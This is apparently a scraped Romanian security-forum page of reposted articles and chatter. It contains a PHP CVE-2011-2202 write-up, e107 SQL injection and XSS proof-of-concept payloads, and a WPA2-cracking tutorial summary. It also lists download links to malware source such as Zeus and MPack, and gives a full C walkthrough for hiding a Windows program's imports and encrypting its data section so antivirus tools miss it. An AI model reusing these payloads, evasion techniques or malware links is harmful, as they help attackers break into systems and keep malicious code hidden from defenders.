File path injection in PHP <= 5.3.6 file upload (CVE 2011-2202) Saturday, June 18, 2011 Since the thing went public before the new PHP version was released, I present full details of the latest PHP vulnerability I reported - together with some sweet demo exploit. The issue was found with fuzzing as part of my recent file upload research. And I still have some more to show in the future. My thanks go to Paweł Goleń who helped analyze the vulnerability. The PHP Part The whole issue is tracked as PHP bug #54939, but the website is now down. The exemplary exploit is at pastebin. The nature of the bug is simple. PHP claims to remove the path component from HTTP file upload forms (transferred as MIME multipart/form-data requests), leaving only the file name given by the user agent. This is both for security, and to fix MSIE incompatibility (IE used to send the full path like this: c:\WINDOWS\WHATEVER\My_file.txt). However, in 2008 PHP developers made an off-by-one error, and, as a result, if a name starts with \ or / and has no other (back)slashes, it's left as-is. So, this allows for: /vmlinuz /autorun.inf (/ will map to C:\ in WINDOWS - the drive where your PHP is run from) /boot.ini and other interesting file "names" to pass through. The application part Of course, what this means is simply that $_FILES[$input_field_name]['name'] will contain an unsanitized file path - and that's not enough to complete an exploit. The PHP script would need to use that filename as a destination for file writing. Unfortunately, at least a few applications do. I've found some pretty interesting examples. Among them is this AjaxFileUpload plugin. There are more applications with the same approach - just go on looking! AjaxFileUpload simply passes the given file "name" to move_uploaded_file(), which would try to create/overwrite a file in a root directory... The set up part And that will most likely fail, because of insufficient permissions. Who on Earth would allow PHP to write to root? 
Well, default Apache installation on Windows systems is run as a SYSTEM user (a.k.a root). Also, for some shared hostings PHP is run in a chroot-ed environment, and / is the document root of a website (which allows for an easy site defacement). It's tricky, I agree, that's why this bug is v. difficult to exploit in the wild (luckily). But it's possible! Today's Heroes: WAMP server, newest version (PHP 5.3.5), default install PHP <= 5.3.6, (5.3.5 in the demo) Windows XP AjaxFileUpload - A jQuery plugin that simulates asynchronous file uploads. In the exploit I simply show that (thanks to vulnerable set up) I can overwrite c:\boot.ini and make the system unbootable. There are more advanced scenarios that could be done (essentially I can supply a boot record file to use on next boot), but it's not my area of expertise. To upload a file, the HTML5 arbitrary file upload technique was used. So, patch your PHPs and bye! Sursa si video demonstrativ: http://blog.kotowicz.net/2011/06/file-path-injection-in-php-536-file.html
-
-
-
e107 0.7.25 Cross Site Scripting / SQL Injection Cred ca inca e destul de folosit... Vulnerability ID: HTB23004 Reference: http://www.htbridge.ch/advisory/multiple_vulnerabilities_in_e107_1.html Product: e107 website system Vendor: e107 ( http://e107.org/ ) Vulnerable Version: 0.7.25 and probably prior Tested on: 0.7.25 Vendor Notification: 25 May 2011 Vulnerability Type: Multiple Vulnerabilities Risk level: Medium Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) Vulnerability Details: 1. SQL injection in e107 The vulnerability exists due to failure in the "/e107_admin/users_extended.php" script to properly sanitize user-supplied input in "user_field" variable. "magic_quotes" must be set to "off". Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database. Attacker can use browser to exploit this vulnerability. The following PoC code is available: POST /e107_admin/users_extended.php?cat= HTTP/1.1 Host: HOST Cookie: <valid session cookies> Content-Type: application/x-www-form-urlencoded Content-Length: user_field=sss','',0, ','','', '0', '253','0','0','253','0','0'),('0',(select user()),'',0,'','','','0','253','0','0','253','0','0'),('0','dfg&user_applicable=253&user_read=0&user_write=253&add_category=Add+category 2. XSS in e107 User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "/e107_admin/users_extended.php" script to properly sanitize user-supplied input in "user_include" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. 
The following PoC code is available:: poc.html <script> setTimeout("document.getElementById('f1').src='http://HOST/e107_admin/users_extended.php'",2000); </script> <iframe id=f1 src='form.html'></iframe> form.html <form method="POST" action="http://HOST/e107_admin/users_extended.php?editext" name=m> <input type="hidden" name="user_field" value="abcde1f1"> <input type="hidden" name="user_text" value="12121"> <input type="hidden" name="user_type" value="1"> <input type="hidden" name="user_include" value='"><script>alert(document.cookie)</script>'> <input type="hidden" name="add_field" value="1"> <input type="hidden" name="user_parent" value="0"> <input type="hidden" name="user_required" value="0"> <input type="hidden" name="user_applicable" value="255"> <input type="hidden" name="user_read" value="0"> <input type="hidden" name="user_write" value="253"> <input type="hidden" name="user_hide" value="0"> <input type=submit> </form> <script> document.m.submit(); </script> Sursa: e107 0.7.25 Cross Site Scripting / SQL Injection ? Packet Storm
-
[Video] Why SSDs are worth the money
Why SSDs are worth the money Here's a great, sweary presentation from Artur Bergman about the joy of using SSDs in your laptop and data-center, and how it's totally, absolutely worth the expense of replacing spinning drives with solid-state drives. I've been solid-state for more than a year, and I totally, absolutely agree. Video: http://www.boingboing.net/2011/06/17/why-ssds-are-worth-t.html -
Learn Python The Hard Way, 2nd Edition This is the HTML preview of Learn Python The Hard Way, 2nd Edition. It is a work in progress and will most likely have some errors as I work on the full release of the 2nd Edition. The Hard Way Is Easier Exercise 0: The Setup Exercise 1: A Good First Program Exercise 2: Comments And Pound Characters Exercise 3: Numbers And Math Exercise 4: Variables And Names Exercise 5: More Variables And Printing Exercise 6: Strings And Text Exercise 7: More Printing Exercise 8: Printing, Printing Exercise 9: Printing, Printing, Printing Exercise 10: What Was That? Exercise 11: Asking Questions Exercise 12: Prompting People Exercise 13: Parameters, Unpacking, Variables Exercise 14: Prompting And Passing Exercise 15: Reading Files Exercise 16: Reading And Writing Files Exercise 17: More Files Exercise 18: Names, Variables, Code, Functions Exercise 19: Functions And Variables Exercise 20: Functions And Files Exercise 21: Functions Can Return Something Exercise 22: What Do You Know So Far? Exercise 23: Read Some Code Exercise 24: More Practice Exercise 25: Even More Practice Exercise 26: Congratulations, Take A Test! 
Exercise 27: Memorizing Logic Exercise 28: Boolean Practice Exercise 29: What If Exercise 30: Else And If Exercise 31: Making Decisions Exercise 32: Loops And Lists Exercise 33: While Loops Exercise 34: Accessing Elements Of Lists Exercise 35: Branches and Functions Exercise 36: Designing and Debugging Exercise 37: Symbol Review Exercise 38: Reading Code Exercise 39: Doing Things To Lists Exercise 40: Dictionaries, Oh Lovely Dictionaries Exercise 41: Gothons From Planet Percal #25 Exercise 42: Gothons Are Getting Classy Exercise 43: You Make A Game Exercise 44: Evaluating Your Game Exercise 45: Is-A, Has-A, Objects, and Classes Exercise 46: A Project Skeleton Exercise 47: Automated Testing Exercise 48: Advanced User Input Exercise 49: Making Sentences Exercise 50: Your First Website Exercise 51: Getting Input From A Browser Exercise 52: Testing The Web Application Next Steps Advice From An Old Programmer Indices and tables Index Module Index Search Page Online: http://learnpythonthehardway.org/book/
-
Cracking WPA2 Tutorial June 16th, 2011 | By: Andrew Whitaker| In this video we will demonstrate how to crack WPA2 using the Airmon-ng suite. We will do it by: Identifying an access point Capturing traffic from that access point Attempt to capture the handshake. We have two options for doing this. We can wait for a client to connect on their own We can run a deauth attack to force them to disconnect and then you can capture the handshake then . Once you have captured the handshake, you can attempt to crack it with a word list or a rainbow table. The key can then be found from there. Enjoy. Youtube: http://www.youtube.com/watch?v=pvjMJKUfAjo Sursa: Cracking WPA2 Tutorial | InfoSec Resources
-
Malware Sourcecode Mpack: http://www.secguru.com/files/MPack_Toolkit_v0.94.rar (pass: infected) Crimepack: MEGAUPLOAD - The leading online storage and file delivery service IncognitoRat: http://incognitorat.com/db/Files GhostRat: MEGAUPLOAD - The leading online storage and file delivery service Exe2Vbs: PURGATORY VIRUS TEAM - Exe2Vbs v1.6 Zeus: http://www.mdl4.com/files/zeus.rar (pass:zeus) Stuxnet: https://github.com/Laurelai/decompile-dump/zipball/master ZeroAccess/Max++(64Bit): http://resources.infosecinstitute.com/wp-content/uploads/Max++-downloader-install_2010.zip Posted by Satyam Pujari a.k.a Satyamhax Sursa: ::eSploit::: Malware Sourcecode
-
Aoleu, cred ca C++ este cel mai bine structura limbaj din perspectiva OOP. Poate doar C# il poate surclasa...
-
Am început cu programele mici in Visual Basic 6. Apoi am pus mana pe o carte de 900 de pagini (Visual Basic 6 - Manualul programatorului) si pe una de vreo 700 (Visual Basic 5 - 1001 de exemple, cam asa ceva) si am inteles limbajul. Cu testele pe diferite API-uri Windows, citind documentatia de pe MSDN pe care initial nu o citeam ci doar banuiam ce fac acele functii, am inceput sa inteleg perfect cum sta treaba. Si cotrobaiam prin multe coduri sursa de unde am invatat multe. Apoi am trecut pe PHP, am citit "Initiere in PHP 5" - Steve Holzner apoi "PHP 4 in imagini" si am invatat cam tot ce imi trebuia la inceput. HTML stiam deja partial, si din ce mai facusem la scoala... Iar MySQL din capitolele dedicate acestui SGBDR din cartile enumerate. Cu timpul am citit si documentatia multor functii de pe php.net si intreg capitolul dedicat PHP 5 - OOP, si multe alte lucruri de pe php.net. Si din coduri sursa am mai invatat cate ceva. Am trecut apoi si la o cartulie de JavaScript si vreau sa invat notiuni mai avansate de MySQL. C++ am invatat din liceu, dar nu mare lucru. Abia anul acesta m-am apucat serios de OOP (facultate) si e singura materie care mi-a placut si la care am inteles cam toate prostiile, cat de marunte, de la mostenire virtuala la RTTI. Am citit "C++ manual complet" - Herbert Schildt, "C++ pentru incepatori volumul II" - Liviu Negreanu, am retinut multe idei din "Secrete C++" - Constantin Galatean... Am citit si o carte despre Java si anume "Java de la 0 la expert" care mi s-a parut cea mai buna carte de programare citita, si o carte despre "Perl", dar nu m-au pasionat aceste limbaje si nu mai stiu mare lucru, nu prea le-am folosit. Pe Linux, shell scripting nu stiu cine stie ce, doar idei de baza, citite intr-un articol, doua si din citirea si modificarea diverselor fisiere de sistem. Eu nu pot citi carti pe calculator, nu suport, prefer formatul pe hartie. Si imi place sa citesc, citeam si literatura... 
In fine, asta e ideea mea de baza: invatati din carti! Una e sa iti explice cineva care lucreaza de ani de zile in domeniu, alta e sa iti explice Vasile de 12 ani care a inteles si el dintr-un tutorial ca daca pui "echo 'Plm';" apare pe site "Plm". Ca tot veni vorba: degeaba invatati un limbaj de programare daca nu lucrati des in el. Faceti proiecte! Cat mai multe si cat mai complexe. Va veti trezi ulterior ca vreti sa va angajati si... CV? Ce o sa treceti acolo? Conteaza proiectele foarte mult, cat de mici. Ca sugestie: faceti-va acum un CV. Si o sa vedeti ca nu prea aveti ce trece acolo. Da, puteti spune ca stiti n limbaje de programare, dar la interviuri se intreaba: - C: scrie in C o functie care inverseaza o lista simplu inlantuita - C++: se da un exemplu cu o functie virtuala si upcasting, sa spui daca codul e corect sau nu (daca vreti sa vedeti cate rahaturi pot sa apara in programe OOP in C++ postati aici si o sa vedeti ca nu e atat de usor sa fii un compilator uman) - PHP: se da o clasa, se serializeaza apoi se deserializeaza un obiect, cu __sleep si __wakeup de riguare. Ce se va afisa daca nu stiu ce... - PHP: se da o clasa abstracta, se mosteneste dar nu se implementeaza toate metodele bla bla... In fine, sunt foarte multe lucruri. Daca nu cititi o documentatie serioasa, gen CARTE nu aveti de unde sa le stiti. Sfatul meu: CITITI!
-
Nu e cine stie ce, trebuia sa fie bazat pe expresii regulate, asa ar fi fost de preferat. Oricum, nu are cum sa detecteze exact o vulnerabilitate, detecteaza partial cod potential vulnerabil. De exemplu, SQL Injection se gaseste la interogari, efectuate de exemplu cu mysql_query. Programul cauta dupa aceste apeluri.
-
S-a lansat Kaspersky Endpoint Security 8 for Linux Securitate | 17 Iunie 2011 Kaspersky Lab anunță lansarea soluției business Kaspersky Endpoint Security 8 for Linux, care combină toate funcționalitățile versiunii anterioare de Kaspersky Anti-Virus 5.7 for Linux cu cele ale Kaspersky Anti-Virus 5.5 for Samba. Administrarea produsului este realizată prin intermediul unei interfețe grafice intuitive, care este pe deplin compatibilă cu ecosistemele desktop Gnome și KDE. De asemenea, parametrii programului pot fi configurați și din fereastra de comandă (command line). Kaspersky Endpoint Security 8 for Linux face parte din linia de soluții de securitate dedicate companiilor și poate fi integrată în infrastructura de securitate a organizației. Aceasta este compatibilă cu toate distribuțiile de Linux, atât pe 32, cât și pe 64 de biți. Kaspersky Endpoint Security 8 for Linux oferă protecție completă stațiilor de lucru care operează pe sisteme Linux, datorită următoarelor inovații: • Soluția include noul motor antivirus – Kaspersky Anti-Virus Engine 8.0, un modul de analiză euristică și suport pentru dezinfectarea fișierelor stocate în arhive. • Kaspersky Endpoint Security 8 for Linux neutralizează cu succes amenințările informatice care țintesc sistemele de operare Linux, precum și pe cele care atacă platformele Windows și Mac OS X. Astfel, suita oferă protecție completă întregii rețele a companiei, care include și stații de lucru care nu operează numai pe Linux. • Noul produs include consola Kaspersky Administration Kit 8.0, o interfață centralizată de management care oferă posibilitatea administrării de la distanță, vizualizarea de rapoarte și modificarea politicilor globale de securitate. „Kaspersky Endpoint Security 8 for Linux extinde oportunitățile disponibile companiilor în termeni de securitate informatică și permite acestora să implementeze sisteme pentru protecția infrastructurii IT, indiferent de platformele de operare folosite pe stațiile de lucru. 
Noua versiune a produsului oferă protecție completă computerelor cu Linux și include instrumentele necesare pentru configurarea, controlul și gestionarea politicilor centralizate de securitate”, a spus Teodor Cimpoeșu, Managing Director Kaspersky Lab România și Bulgaria. Sursa: S-a lansat Kaspersky Endpoint Security 8 for Linux | Agora.ro
-
Pentru cei care cauta vulnerabilitati in codul sursa e painea lui Dumnezeu.
-
Au strans 150.000 de "fani" pe twitter. Si i-au pus sa sune la un anumit numar. Apelurile erau redirectionate catre Wow Call Center de exemplu. Si cica sunt "1337"... Ratati...
-
Eu am zis parerea mea in alt topic. Au fost niste atacuri la diverse site-uri, care erau deja revendicate de "x" si "y" apoi se trezesc ratatii astia si zic ca ei sunt "hackerii". La fel si cu pron.com de exemplu, cred ca mai intai a fost gasit de Tinko de al nostru apoi se trezesc ratatii astia sa zica ca ei l-au gasit. De fapt nici nu zic, doar ca se trezesc niste rahati imputiti din presa (muie presei) care ii promoveaza.
-
DDOS. Ratati. Tot e posibil sa nu fi avut nicio legatura. Script-kiddies. De exemplu au postat un nr. de telefon pe twitter, ratatii au sunat si redirectionau apelurile la diverse Call-Centers ale anumitor companii. Ce "1337"... Copii fara viitor.
-
Probabil: - Florin Salam - Am norocul scris in frunte :->
-
Script pentru furat parole de steam, de vanzare
Ne ia 2 minute sa facem o asemenea pagina, de ce am plati pentru ea? Da, nu ai nimerit unde trebuie, nu gasesti aici clienti pentru asemenea porcarii. -
JavaScript PDF Reader Interesanta idee... Download: https://github.com/andreasgal/pdf.js https://raw.github.com/andreasgal/pdf.js/master/pdf.js
-
The Art of the Cyberwar The development of new technologies, catching up with military interests, and the dependence of developed countries on existing technology set up a scenario in which cyber war, or war in cyberspace, is becoming more important. All countries aware of the risks of such dependence have developed defense programs against attacks that could jeopardize critical national infrastructure. On the other hand, developing countries and major world powers are training computer security experts in various techniques of hacking, cracking, virology, etc., forming true experts in cyber warfare, called cyberwarriors. Nobody doubts that future wars will be decided not on land, at sea or in the air, but in cyberspace. The soldiers will carry not weapons or shields but knowledge, and will deploy applications - war viruses - that disable the enemy's critical, technology-dependent systems. This is the scenario the world is moving toward now: a scenario of technological dependence, where countries with more traditional military strength will lose the ability to wage war against countries highly qualified in computer security and cyber techniques. This essay is intended as a point of reflection and knowledge about cyber warfare, based on the philosophy of Sun Tzu in The Art of War, adapting that knowledge to the technological scenario in which we live, so that we can obtain a modern compendium: The Art of Cyberwar. Download: http://www.malwareint.com/docs/the-art-of-the-cyberwar-en.pdf
-
Nu mai stiu exact ce si cum, dar vazusem cu mult inainte niste "atacuri" deja "semnate" de nu stiu cine pe care s-au gandit ei sa si le atribuie. Si au facut asta de multe ori. La fel cu Play Station, datele facute publice au aparut mai intai in alte locatii, apoi s-au trezit ei ca au spart ei site-urile celor de la Sony... Si acum tot isi atribuie ce se intampla pe mapamond. Sunt niste ratati.
-
LulzSec says it hacked U.S. Senate website and Bethesda gaming servers
LulzSec spun multe. Spun ca ei au "spart" tot ce s-a "spart" de multa vreme pana in prezent. Sunt niste ratati. -
Clever tricks against antiviruses I bet you have come across some software you’ve made which you didn’t want the AV to pick up. This article explains how to import from DLLs without having to call GetProcAddress, and also how to encrypt your data section. Anti-viruses rely heavily on their heuristics, if all other (signature) scans fail. The patterns they search for in your executable, are the functions being imported, and the order they are being called. No imports! Having no import table is relatively easy. There are however some functions I haven’t imported dynamically, but which are very normal in any application (libc functions). The steps you need to do are: Get the kernel32 module base address. (kernel32.dll is always loaded when the process is started, and so is ntdll.dll) Make your own GetProcAddress Use it to find LoadLibrary’s address, so that you can load other DLLs Make the functions usable in a practical way, so that you don’t have to make a prototype for each of the functions that you will load 1. Get kernel32?s base address The first step is easy. There are lots of methods out there to retrieve the kernel32 base address, whose list of supported platforms varies greatly. I will be retrieving the address using the PEB (the linked list of the modules’ initialization order). Code: void __declspec(naked) *kernel_addr() { // Get kernel32 base address through PEB (initialization order) __asm { mov eax, fs:[0x30] // PEB address mov eax, [eax+0x0c] // PEB->Ldr mov eax, [eax+0x1c] // Ldr.InInitializationOrderModuleList (ntdll) mov eax, [eax] // [ntdll].Flink (kernel32) mov eax, [eax+0x08] // kernel32 base address ret } } You can use whichever method you want, really, as long as the end result is the kernel32 base address. 2. Our own GetProcAddress If you have ever had to deal with the PE format, you’d know that the exports have three main structures. These are the address table, the name table, and the ordinal table. 
The address table is simply just an array with RVAs to functions. There is one entry for every function exported. To get the real address, you add that RVA to the base address of the module. The name table, is another array with RVA’s to the names of the functions. The names are just strings of characters terminated by a null byte. The problem is, the names’ index doesn’t always correspond to the functions’ index. To retrieve the index, you use the ordinal table. The ordinal table is basically just an array with an index to the corresponding function. For example EAT[0] might be the function with the name ENT[42]. In this case, EOT[42] has the value of 0. So, the ordinal table is just another table, which maps a name to a function, using the name’s index to retrieve the function’s index. void *my_gpa(HMODULE modl, char *fname) { unsigned long modb = (unsigned long)modl; IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)modb; IMAGE_NT_HEADERS *nth = (IMAGE_NT_HEADERS *)(modb+dosh->e_lfanew); IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(modb+nth->OptionalHeader.DataDirectory->VirtualAddress); unsigned int i; for(i = 0; i < ied->NumberOfNames; i++) { const char *nn = (*(const char **)(ied->AddressOfNames+modb+i*sizeof(void *)))+modb; if(!strcmp(fname, nn)) { unsigned short ordinal = *(unsigned short *)(ied->AddressOfNameOrdinals+modb+i*sizeof(unsigned short)); return (void *)((unsigned long)*(void **)(ied->AddressOfFunctions+modb+ordinal*sizeof(void *))+modb); } } return NULL; } In our code, modb is the base address of the module. Using that, we make our way to the export directory (ied), which contains the RVAs to the three tables we need. They are ied->AddressOfNames, ied->AddressOfFunctions and ied->AddressOfNameOrdinals. There’s some pointer arithmetic going on there, along with some type casting. Our function works just like GetProcAddress. It takes a module base address, and a function name, and returns a function address. 
We iterate through each entry in the name table. The string is retrieved through nn. (RVA of the table + base address + i*4)+base address – each entry in the table has the size of a word (32 bits = 4 bytes), so to get to the i’th entry, we add i*4. Once we’ve gotten to the i’th entry and dereferenced it, we add the base address to get the string’s address. If the name’s are the same, get the ordinal, the same way (except that one ordinal is the size of a short, 16 bits = 2 bytes). Then using the ordinal as an index, retrieve the address of the function and return it. 3. Getting LoadLibrary’s address Easiest step. The code speaks for itself: HMODULE (__stdcall *dyn_ll)(LPCTSTR lpFileName); dyn_ll = my_gpa(kern, "LoadLibraryA"); 4. Making it usable You will probably want to load lots of functions, not just one or two. Writing the prototypes for all of them would be tedious. Let’s make an array of functions for each module we will load, then let’s also make a function to load the APIs into these arrays. I have used kernel32, user32, and winsock. 
// don't forget to specify the correct calling convention char *fn_kernel[] = { "GetEnvironmentVariableA", // 0 "GetModuleFileNameA", // 1 "GetTickCount", // 2 "GetLocalTime", // 3 "CreateThread", // 4 "SetThreadPriority", // 5 }; unsigned long (__stdcall *func_kernel[sizeof(fn_kernel)/sizeof(*fn_kernel)])(); char *fn_user[] = { "MessageBoxA", // 0 "GetForegroundWindow", // 1 "GetWindowTextA", // 2 }; unsigned long (__stdcall *func_user[sizeof(fn_user)/sizeof(*fn_user)])(); char *fn_wsock[] = { "WSAStartup", // 0 "send", // 1 "connect", // 2 "socket", // 3 "gethostbyname", // 4 "closesocket", // 5 "recv", // 6 "WSACleanup", // 7 }; unsigned long (WSAAPI *func_wsock[sizeof(fn_wsock)/sizeof(*fn_wsock)])(); HMODULE (__stdcall *dyn_ll)(LPCTSTR lpFileName); void *my_gpa(HMODULE modl, char *fname) { unsigned long modb = (unsigned long)modl; IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)modb; IMAGE_NT_HEADERS *nth = (IMAGE_NT_HEADERS *)(modb+dosh->e_lfanew); IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(modb+nth->OptionalHeader.DataDirectory->VirtualAddress); unsigned int i; for(i = 0; i < ied->NumberOfNames; i++) { const char *nn = (*(const char **)(ied->AddressOfNames+modb+i*sizeof(unsigned long)))+modb; if(!strcmp(fname, nn)) { unsigned short ordinal = *(unsigned short *)(ied->AddressOfNameOrdinals+modb+i*sizeof(unsigned short)); return (void *)((unsigned long)*(void **)(ied->AddressOfFunctions+modb+ordinal*sizeof(unsigned long))+modb); } } return NULL; } void load_imports() { HMODULE kern, user, wsock; unsigned long i; kern = kernel_addr(); dyn_ll = my_gpa(kern, "LoadLibraryA"); user = dyn_ll("user32.dll"); wsock = dyn_ll("ws2_32.dll"); for(i = 0; i < sizeof(fn_kernel)/sizeof(*fn_kernel); i++) func_kernel[i] = my_gpa(kern, fn_kernel[i]); for(i = 0; i < sizeof(fn_user)/sizeof(*fn_user); i++) func_user[i] = my_gpa(user, fn_user[i]); for(i = 0; i < sizeof(fn_wsock)/sizeof(*fn_wsock); i++) func_wsock[i] = my_gpa(wsock, fn_wsock[i]); } int main(int argc, char 
*argv[]) { WSADATA wsd; load_imports(); // MessageBoxA func_user[0](0, "MessageBoxA has been called!", "0wn3d.", MB_OK); func_wsock[0](MAKEWORD(1, 0), &wsd); // WSAStartup // evil stuff here func_wsock[7](); // WSACleanup return EXIT_SUCCESS; } Simple. Encrypting your data section This method is really easy, and of course it’s not nearly as good as the average packer, but it keeps AVs away from your strings. I have used the rc4 cipher, but any symmetric stream cipher would do. We need to encrypt it from another separate program, and have our program decrypt itself. Code for the encryption program: #include <windows.h> #include <imagehlp.h> #include <stdlib.h> #include <stdio.h> #define DATA ".data" // data section's name #define KEY "DqHAI5VN" // encryption key #define NEW 0x11c8 // new ep rva #define REP 0x5e4 // offset to patch with the old ep void rc4_ksched(unsigned char *key, unsigned long keylen, unsigned char sbox[0x100]) { unsigned long i, j; for(i = 0; i < 0x100; i++) sbox[i] = (unsigned char)i; for(j = i = 0; i < 0x100; i++) { unsigned char tmp; j = (j + sbox[i] + key[i % keylen]) & 0xff; tmp = sbox[i]; sbox[i] = sbox[j]; sbox[j] = tmp; } } void rc4(unsigned char sbox[0x100], unsigned char *src, unsigned char *dest, unsigned long len) { unsigned long i, j; i = j = 0; while(len--) { unsigned char tmp; i = (i + 1) & 0xff; j = (j + sbox[i]) & 0xff; tmp = sbox[i]; sbox[i] = sbox[j]; sbox[j] = tmp; *dest++ = *src++ ^ sbox[(sbox[i] + sbox[j]) % 0xff]; } } int main(int argc, char *argv) { FILE *f = fopen("evil.exe", "r+b"); IMAGE_DOS_HEADER dosh; IMAGE_NT_HEADERS nth; IMAGE_SECTION_HEADER sech, dummy; if(!f) return 1; memset(&dummy, 0, sizeof(dummy)); fread(&dosh, 1, sizeof(dosh), f); fseek(f, dosh.e_lfanew, SEEK_SET); fread(&nth, 1, sizeof(nth), f); fread(&sech, 1, sizeof(sech), f); while(memcmp(&sech, &dummy, sizeof(dummy))) { if(!strcmp(sech.Name, DATA)) { unsigned char sbox[0x100], *rd = malloc(sech.SizeOfRawData); DWORD ep, epaddr; rc4_ksched(KEY, 8, sbox); 
fseek(f, sech.PointerToRawData, SEEK_SET); fread(rd, 1, sech.SizeOfRawData, f); rc4(sbox, rd, rd, sech.SizeOfRawData); fseek(f, sech.PointerToRawData, SEEK_SET); fwrite(rd, 1, sech.SizeOfRawData, f); free(rd); epaddr = ((unsigned long)&nth.OptionalHeader.AddressOfEntryPoint-(unsigned long)&nth)+dosh.e_lfanew; fseek(f, epaddr, SEEK_SET); ep = NEW; fwrite(&ep, 1, 4, f); fseek(f, REP, SEEK_SET); ep = nth.OptionalHeader.AddressOfEntryPoint+nth.OptionalHeader.ImageBase; fwrite(&ep, 1, 4, f); fclose(f); return EXIT_SUCCESS; } fread(&sech, 1, sizeof(sech), f); } fclose(f); return EXIT_FAILURE; } What it does is that it searches for the data section, and when found, it reads it into memory, encrypts it, and writes it back. But to be able to decrypt it we must have some piece of code in our own executable, which will decrypt the data section using our key, and then jump back to the old entry point. void decrypt_data(unsigned long mod) { char data[6]; IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)mod; IMAGE_SECTION_HEADER *sech = (IMAGE_SECTION_HEADER *)(mod+dosh->e_lfanew+sizeof(IMAGE_NT_HEADERS)); IMAGE_SECTION_HEADER dummy; data[0] = '.'; data[1] = 'd'; data[2] = 'a'; data[3] = 't'; data[4] = 'a'; data[5] = 0; memset(&dummy, 0, sizeof(dummy)); while(memcmp(sech, &dummy, sizeof(dummy))) { if(!strcmp(sech->Name, data)) { unsigned char sbox[0x100], key[9]; key[0] = 'D'; key[1] = 'q'; key[2] = 'H'; key[3] = 'A'; key[4] = 'I'; key[5] = '5'; key[6] = 'V'; key[7] = 'N'; key[8] = 0; rc4_ksched(key, 8, sbox); rc4(sbox, (unsigned char *)mod+sech->VirtualAddress, (unsigned char *)mod+sech->VirtualAddress, sech->SizeOfRawData); return; } sech++; } exit(EXIT_FAILURE); } void __declspec(naked) *gba() { __asm { mov eax, fs:[0x30] // PEB address mov eax, [eax+0x08] // PEB->BaseAddress ret } } void __declspec(naked) new_ep() { if(*(unsigned long *)magic != 'x86!') decrypt_data((unsigned long)gba()); __asm { push 0x41414141 // placeholder ret } } And in main: unsigned long nep_addr; int 
main(int argc, char *argv[]) { WSADATA wsd; nep_addr = (unsigned long)&new_ep; load_imports(); // MessageBoxA func_user[0](0, "MessageBoxA has been called!", "0wn3d.", MB_OK); func_wsock[0](MAKEWORD(1, 0), &wsd); // WSAStartup // evil stuff here func_wsock[7](); // WSACleanup return EXIT_SUCCESS; } We reference new_ep, because otherwise the optimizing compiler would notice that it is not called anywhere and would not generate code for it. Here you will have to get some offsets. First compile the executable, and disassemble it. Find the RVA of new_ep, and put it in the encryption program source code. Then find the offset of the placeholder for the old entry point. The instruction will look like push 0×41414141. Add one to the address of that instruction, subtract the image base from it, subtract the RVA of the .text section from it, add the offset of the .text section to it, and there you have your offset. Now put it in the encryption source, compile it, run it, and everything is ready Well, that was everything. If you found this article helpful or have a question, feel free to post a comment. Articolul mai elegant: http://www.x-n2o.com/clever-tricks-against-antiviruses/
-
AES Explained Hello people, It’s been a while since I have last posted an article. I decided to write an article about the Advanced Encryption Standard. I will explain certain concepts regarding AES and how it basically works. I will provide step by step C code, to make it even easier to understand. You can find the full source code at the end of this article. Actually many websites around the net provide source code for AES. This one is supposed to be easy to understand What is AES? AES is a cryptographic algorithm, more specifically a symmetric block cipher. This means that it operates on a block of data, instead of a single element per iteration. (This element could be a bit or a byte). AES is also known as Rijndael. Actually AES is just a variant of Rijndael. To read more about AES/Rijndael see Advanced Encryption Standard - Wikipedia, the free encyclopedia. Especially the links at the bottom, they help understanding the basic structure of AES. AES is able to encrypt and decrypt a block of data using a key. The key and the block of data (from now on, the input) have a fixed length. The input is always 128-bit (16 bytes), while the key can be 128-bit, 192-bit or 256-bit (16, 24 and 32 bytes respectively). What makes AES so good you say? The answer would be its security and speed. It’s obviously secure since it’s been chosen by NIST. Then again, no one has been able to break it. And finally, it’s fast because its arithmetic is based on XOR operations and bit shifts, which CPUs like a lot. That said, it’s also simple and even faster to implement in hardware. AES Concepts Before I begin talking about the cipher itself, there are some very important concepts that I need to explain. They’re basically the math behind AES. Everything else is easy. This is actually the hardest part. Why am I explaining the hardest part before everything else? Because if you don’t understand this, you won’t be able to understand the rest of this article. 
Of course, if you just want the source code, skip to the end. The content below may refer to the specification, which is located here: http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf Articolul frumos aranjat: http://www.x-n2o.com/aes-explained/